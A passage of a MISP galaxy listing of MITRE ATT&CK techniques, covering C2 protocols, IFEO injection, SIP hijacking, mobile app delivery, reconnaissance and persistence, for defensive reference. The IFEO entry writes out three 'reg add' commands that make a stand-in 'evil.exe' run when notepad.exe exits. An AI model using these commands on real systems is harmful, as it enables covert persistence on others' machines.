https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf
https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
https://technet.microsoft.com/en-us/sysinternals/bb963902
https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

Custom Command and Control Protocol - T1094

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Standard Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.

The tag is: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094"

View relationships graph

Custom Command and Control Protocol - T1094 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 3161. Table References
Links
https://attack.mitre.org/techniques/T1094
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Trusted Developer Utilities Proxy Execution - T1127

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127"

Table 3162. Table References
Links
https://attack.mitre.org/techniques/T1127
https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

App Delivered via Web Download - T1431

The application is downloaded from an arbitrary web site. A link to the application’s download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Web Download - T1431"

View relationships graph

App Delivered via Web Download - T1431 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 3163. Table References
Links
https://attack.mitre.org/techniques/T1431

Image File Execution Options Injection - T1183

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)

<code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>
<code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>
<code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"</code>

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183"

View relationships graph

Image File Execution Options Injection - T1183 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 3164. Table References
Links
https://attack.mitre.org/techniques/T1183
https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/
https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview
https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml
https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

SIP and Trust Provider Hijacking - T1198

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

The tag is: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198"

View relationships graph

SIP and Trust Provider Hijacking - T1198 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"

Table 3165. Table References
Links
https://attack.mitre.org/techniques/T1198
https://msdn.microsoft.com/library/ms537359.aspx
https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx
https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/
https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files
https://github.com/mattifestation/PoCSubjectInterfacePackage
http://www.entrust.net/knowledge-base/technote.cfm?tn=8165
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

File and Directory Permissions Modification - T1222

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222"

Table 3166. Table References
Links
https://attack.mitre.org/techniques/T1222
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

Assess leadership areas of interest - T1224

Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)

The tag is: misp-galaxy:mitre-attack-pattern="Assess leadership areas of interest - T1224"

Table 3167. Table References
Links
https://attack.mitre.org/techniques/T1224

Determine 3rd party infrastructure services - T1284

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284"

View relationships graph

Determine 3rd party infrastructure services - T1284 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260" with estimative-language:likelihood-probability="almost-certain"

Table 3168. Table References
Links
https://attack.mitre.org/techniques/T1284

Determine highest level tactical element - T1243

From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine highest level tactical element - T1243"

Table 3169. Table References
Links
https://attack.mitre.org/techniques/T1243

Determine secondary level tactical element - T1244

The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine secondary level tactical element - T1244"

Table 3170. Table References
Links
https://attack.mitre.org/techniques/T1244

Attack PC via USB Connection - T1427

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

The tag is: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427"

Table 3171. Table References
Links
https://attack.mitre.org/techniques/T1427
https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html
http://dl.acm.org/citation.cfm?id=1920314
http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/

Determine centralization of IT management - T1285

Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)

The tag is: misp-galaxy:mitre-attack-pattern="Determine centralization of IT management - T1285"

Table 3172. Table References
Links
https://attack.mitre.org/techniques/T1285

Determine external network trust dependencies - T1259

Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)

The tag is: misp-galaxy:mitre-attack-pattern="Determine external network trust dependencies - T1259"

Table 3173. Table References
Links
https://attack.mitre.org/techniques/T1259

Analyze organizational skillsets and deficiencies - T1297

Understanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297"

View relationships graph

Analyze organizational skillsets and deficiencies - T1297 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289" with estimative-language:likelihood-probability="almost-certain"

Table 3174. Table References
Links
https://attack.mitre.org/techniques/T1297

Analyze architecture and configuration posture - T1288

An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze architecture and configuration posture - T1288"

Table 3175. Table References
Links
https://attack.mitre.org/techniques/T1288

Analyze organizational skillsets and deficiencies - T1289

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289"

View relationships graph

Analyze organizational skillsets and deficiencies - T1289 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300" with estimative-language:likelihood-probability="almost-certain"

Table 3176. Table References
Links
https://attack.mitre.org/techniques/T1289

Leverage compromised 3rd party resources - T1375

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Leverage compromised 3rd party resources - T1375"

Table 3177. Table References
Links
https://attack.mitre.org/techniques/T1375

Procure required equipment and software - T1335

An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)

The tag is: misp-galaxy:mitre-attack-pattern="Procure required equipment and software - T1335"

Table 3178. Table References
Links
https://attack.mitre.org/techniques/T1335
https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

SSL certificate acquisition for domain - T1337

Certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of [Wachovia](https://www.wellsfargo.com/about/corporate/wachovia) — homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)

The tag is: misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for domain - T1337"

Table 3179. Table References
Links
https://attack.mitre.org/techniques/T1337
https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Confirmation of launched compromise achieved - T1383

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)

The tag is: misp-galaxy:mitre-attack-pattern="Confirmation of launched compromise achieved - T1383"

Table 3180. Table References
Links
https://attack.mitre.org/techniques/T1383

App Delivered via Email Attachment - T1434

The application is delivered as an email attachment.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Email Attachment - T1434"

View relationships graph

App Delivered via Email Attachment - T1434 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 3181. Table References
Links
https://attack.mitre.org/techniques/T1434

Create or Modify System Process - T1543

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).

The tag is: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543"

Table 3182. Table References
Links
https://attack.mitre.org/techniques/T1543
https://technet.microsoft.com/en-us/library/cc772408.aspx
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

Build and configure delivery systems - T1347

Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Build and configure delivery systems - T1347"

Table 3183. Table References
Links
https://attack.mitre.org/techniques/T1347

Automated system performs requested action - T1384

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Users may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)

The tag is: misp-galaxy:mitre-attack-pattern="Automated system performs requested action - T1384"

Table 3184. Table References
Links
https://attack.mitre.org/techniques/T1384

Eavesdrop on Insecure Network Communication - T1439

If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)

The tag is: misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439"

Table 3185. Table References
Links
https://attack.mitre.org/techniques/T1439
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html
https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps

Distribute malicious software development tools - T1394

An adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)

The tag is: misp-galaxy:mitre-attack-pattern="Distribute malicious software development tools - T1394"

Table 3186. Table References
Links
https://attack.mitre.org/techniques/T1394

Transfer Data to Cloud Account - T1537

Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537"

Table 3187. Table References
Links
https://attack.mitre.org/techniques/T1537
https://www.justice.gov/file/1080281/download

Review logs and residual traces - T1358

Execution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. (Citation: EDB-39007) (Citation: infosec-covering-tracks)

The tag is: misp-galaxy:mitre-attack-pattern="Review logs and residual traces - T1358"

Table 3188. Table References
Links
https://attack.mitre.org/techniques/T1358

Runtime code download and execution - T1395

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Runtime code download and execution - T1395"

Table 3189. Table References
Links
https://attack.mitre.org/techniques/T1395

Test malware to evade detection - T1359

An adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware to evade detection - T1359"

Table 3190. Table References
Links
https://attack.mitre.org/techniques/T1359

Replace legitimate binary with malware - T1378

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Replacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)

The tag is: misp-galaxy:mitre-attack-pattern="Replace legitimate binary with malware - T1378"

Table 3191. Table References
Links
https://attack.mitre.org/techniques/T1378

Compromise of externally facing system - T1388

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Externally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise of externally facing system - T1388"

Table 3192. Table References
Links
https://attack.mitre.org/techniques/T1388

Jamming or Denial of Service - T1464

An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)

The tag is: misp-galaxy:mitre-attack-pattern="Jamming or Denial of Service - T1464"

Table 3193. Table References
Links
https://attack.mitre.org/techniques/T1464
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html
https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html
https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html
http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf
https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/
https://www.nytimes.com/2007/11/04/technology/04jammer.html
https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/
https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/

Boot or Logon Autostart Execution - T1547

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547"

Table 3194. Table References
Links
https://attack.mitre.org/techniques/T1547
https://capec.mitre.org/data/definitions/564.html
http://msdn.microsoft.com/en-us/library/aa376977
https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
https://technet.microsoft.com/en-us/sysinternals/bb963902

Remotely Track Device Without Authorization - T1468

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468"

Table 3195. Table References
Links
https://attack.mitre.org/techniques/T1468
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html
https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html
https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/

Remotely Wipe Data Without Authorization - T1469

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Wipe Data Without Authorization - T1469"

Table 3196. Table References
Links
https://attack.mitre.org/techniques/T1469
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html
https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html
https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/

Install Insecure or Malicious Configuration - T1478

An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).

For example, an unwanted Certification Authority (CA) certificate could be placed in the device’s trusted certificate store, increasing the device’s susceptibility to man-in-the-middle network attacks seeking to eavesdrop on or manipulate the device’s network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)).

On iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device’s network traffic through an adversary’s system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).

The tag is: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"

Table 3197. Table References
Links
https://attack.mitre.org/techniques/T1478
https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html
https://www.symantec.com/connect/blogs/malicious-profiles-sleeping-giant-ios-security
https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html

Steal or Forge Kerberos Tickets - T1558

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)

